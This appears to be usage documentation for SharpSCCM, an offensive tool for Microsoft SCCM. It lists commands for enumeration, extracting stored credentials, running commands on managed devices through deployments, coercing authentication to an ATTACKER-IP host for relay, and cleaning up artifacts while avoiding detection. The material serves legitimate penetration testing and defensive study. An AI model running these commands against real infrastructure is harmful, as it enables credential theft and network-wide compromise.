Skip to main content
Built-in Help: All commands and subcommands include automatically generated help pages accessible with -h, --help, /h, /?, or -?

Basic Syntax

SharpSCCM.exe [command] [subcommand] [options]

Global Options

These options are available across most SharpSCCM commands:
OptionDescriptionExample
-sms, --sms-providerSMS Provider server-sms SCCM01.corp.local
-mp, --management-pointManagement Point server-mp SCCM01.corp.local
-sc, --site-codeThree-character site code-sc PS1
--debugEnable debug output--debug
--no-bannerSuppress banner output--no-banner
-?, -h, --helpDisplay help information--help
Control how SharpSCCM displays information:
OptionDescriptionUsage
-v, --verboseDisplay all propertiesDetailed output
-c, --countReturn count of resultsNumerical summary
-z, --dry-runShow queries without executionTesting syntax
-j, --jsonJSON output formatMachine-readable output
-o, --output-fileSave output to fileResults archival
Configure how SharpSCCM connects to SCCM infrastructure:
OptionDescriptionNotes
-smsSMS Provider addressCan be IP, FQDN, or NetBIOS name
-mpManagement Point addressUsually same as SMS Provider
-scSite codeAuto-detected if not specified
-n, --wmi-namespaceWMI namespaceCustom namespace targeting

Command Categories

  • Information Gathering
  • Credential Extraction
  • Lateral Movement
  • Infrastructure Management
  • Advanced Operations
get Command Group - Extract information from SCCM infrastructure
# Discover site information via LDAP
SharpSCCM.exe get site-info -d corp.local

# Get current management point and site code
SharpSCCM.exe local site-info
Common Parameters:
  • -n, --name: Filter by name pattern
  • -p, --properties: Specify properties to retrieve
  • -w, --where-condition: Custom WQL WHERE clause
  • -o, --order-by: Sort results

Site Configuration

Auto-Detection: SharpSCCM automatically detects site configuration when possible. Manual specification is only required in complex environments or when targeting specific infrastructure.

Automatic Site Discovery

1

Local Client Configuration

SharpSCCM first attempts to read local SCCM client configuration:
# Check local site information
SharpSCCM.exe local site-info
This reads from the local WMI repository at \\127.0.0.1\root\CCM.
2

Management Point Detection

If local configuration is available, SharpSCCM uses the current management point:
Current management point: SCCM01.corp.local
Site code: PS1
3

SMS Provider Location

The SMS Provider role may be hosted separately from management points. Use site discovery to identify it:
SharpSCCM.exe get site-info -d corp.local

Manual Configuration

Scenarios requiring manual configuration:
  • Non-domain joined systems
  • SCCM client not installed
  • Targeting different sites
  • SMS Provider on separate server
  • Cross-domain operations
Manual specification examples:
# Specify SMS Provider and site code
SharpSCCM.exe get admins -sms SCCM01.corp.local -sc PS1

# Different management point
SharpSCCM.exe get secrets -mp MP01.corp.local -sc PS1

# Cross-domain targeting
SharpSCCM.exe get site-info -d external.corp.local

Authentication & Permissions

  • Authentication Methods
  • Required Permissions
  • Environment Targeting
Integrated Windows Authentication (Default)
# Uses current user context
SharpSCCM.exe get admins
Computer Account Authentication
# For credential extraction
SharpSCCM.exe get secrets -u COMPUTER$ -p password -r NEWDEVICE
Certificate-Based Authentication
# Using existing certificate
SharpSCCM.exe get secrets -c <cert-blob> -i <client-id>
Elevated Privileges
# Local elevation for credential extraction
SharpSCCM.exe local secrets -m wmi -s

Common Usage Patterns

Step 1: Site Discovery
# Discover site infrastructure
SharpSCCM.exe get site-info -d corp.local
SharpSCCM.exe local site-info
Step 2: Administrative Enumeration
# List administrators and permissions
SharpSCCM.exe get admins -v
SharpSCCM.exe get site-push-settings
Step 3: Asset Discovery
# Enumerate managed assets
SharpSCCM.exe get devices -c
SharpSCCM.exe get collections
SharpSCCM.exe get applications -c
Step 4: Configuration Analysis
# Analyze security configuration
SharpSCCM.exe get deployments
SharpSCCM.exe local triage
Step 1: Local Credential Extraction
# Extract from local WMI (if admin)
SharpSCCM.exe local secrets -m wmi

# Historical extraction from disk
SharpSCCM.exe local secrets -m disk
Step 2: Policy-Based Extraction
# Request policies from management point
SharpSCCM.exe get secrets

# With device registration
SharpSCCM.exe get secrets -r TESTDEVICE -u COMPUTER$ -p password
Step 3: Credential Validation
# Use extracted credentials for further enumeration
# (credentials would be used outside SharpSCCM)
Step 1: Target Identification
# Find target devices
SharpSCCM.exe get devices -n WORKSTATION
SharpSCCM.exe get collection-members -n "Domain Computers"
Step 2: Application Deployment
# Create and deploy application
SharpSCCM.exe new application -n "TestApp" -p "cmd.exe /c whoami"
SharpSCCM.exe new deployment -a "TestApp" -c "Domain Computers"
Step 3: Direct Execution
# Execute on specific targets
SharpSCCM.exe exec -d WORKSTATION01 -p "powershell.exe -c Get-Process"
Step 4: Cleanup
# Remove artifacts
SharpSCCM.exe remove deployment "TestApp_Install"
SharpSCCM.exe remove application "TestApp"
Step 1: Target Assessment
# Identify client push settings
SharpSCCM.exe get site-push-settings

# Find user primary devices
SharpSCCM.exe get primary-users -u targetuser
Step 2: Coercion Execution
# Client push coercion
SharpSCCM.exe invoke client-push -t ATTACKER-IP

# Client-based coercion
SharpSCCM.exe exec -d TARGET -r ATTACKER-IP
Step 3: Authentication Capture
# Capture would be handled by external tools
# (Responder, ntlmrelayx, etc.)

Output Formats & Filtering

  • Output Control
  • Filtering & Querying
  • Result Ordering
Standard Output
# Default formatted output
SharpSCCM.exe get devices

# Verbose output with all properties
SharpSCCM.exe get devices -v

# Count only
SharpSCCM.exe get devices -c
File Output
# Save to file
SharpSCCM.exe get devices -o devices.txt

# JSON format
SharpSCCM.exe invoke admin-service -q "IPConfig" -r 16777226 -j
Quiet Operations
# Suppress banner
SharpSCCM.exe get devices --no-banner

# Debug information
SharpSCCM.exe get devices --debug

Troubleshooting & Debugging

Symptoms: Connection failures, authentication errorsDiagnostic Commands:
# Test local connectivity
SharpSCCM.exe local site-info --debug

# Test specific server
SharpSCCM.exe get admins -sms SERVER --debug --dry-run

# Verify WMI connectivity
SharpSCCM.exe get classes -sms SERVER
Common Solutions:
  • Verify SCCM client is installed and functioning
  • Check network connectivity to SMS Provider
  • Validate user permissions and group membership
  • Ensure proper site code and server names
Symptoms: Access denied, insufficient permissionsDiagnostic Approach:
# Check current user context
whoami /groups

# Test with minimal permissions
SharpSCCM.exe get site-info --debug

# Verify SCCM role assignments
SharpSCCM.exe get admins | findstr %USERNAME%
Resolution Steps:
  • Add user to SMS Admins local group
  • Assign appropriate SCCM security roles
  • Use computer account for credential extraction
  • Escalate privileges locally if needed
Symptoms: Invalid WQL syntax, query failuresTesting Approach:
# Test query syntax with dry run
SharpSCCM.exe get devices -w "Invalid syntax" -z

# Validate WMI classes
SharpSCCM.exe get classes | findstr SMS_R_System

# Check class properties
SharpSCCM.exe get class-properties SMS_R_System
Best Practices:
  • Use dry run to validate syntax
  • Start with simple queries
  • Reference WMI class documentation
  • Escape special characters properly
Symptoms: No results, unexpected outputDebugging Commands:
# Enable debug output
SharpSCCM.exe get devices --debug

# Check result count
SharpSCCM.exe get devices -c

# Use verbose output
SharpSCCM.exe get devices -v
Analysis Steps:
  • Verify query returned results with count option
  • Check permissions for the queried objects
  • Use verbose mode to see all available properties
  • Review debug output for connection details

Best Practices

1

Start with Read-Only Operations

Begin reconnaissance with safe, read-only commands:
SharpSCCM.exe local site-info
SharpSCCM.exe get site-info -d corp.local
SharpSCCM.exe get admins -c
2

Use Dry Run for Testing

Test command syntax before execution:
SharpSCCM.exe get devices -w "Complex WHERE clause" -z
SharpSCCM.exe invoke query "Custom WQL query" -z
3

Document Your Activities

Save output for analysis and documentation:
SharpSCCM.exe get admins -v -o administrators.txt
SharpSCCM.exe get site-push-settings -o site-config.txt
4

Clean Up After Operations

Remove any created artifacts:
SharpSCCM.exe remove application "TestApp"
SharpSCCM.exe remove collection -n "TestCollection"
5

Monitor for Detection

Be aware of potential detection points:
  • SCCM audit logs
  • Unusual WMI queries
  • Administrative role usage
  • Application deployment events
Tab Completion: SharpSCCM supports command-line tab completion with dotnet-suggest, but it’s disabled by default to avoid creating temporary files. See the command-line API documentation for more information.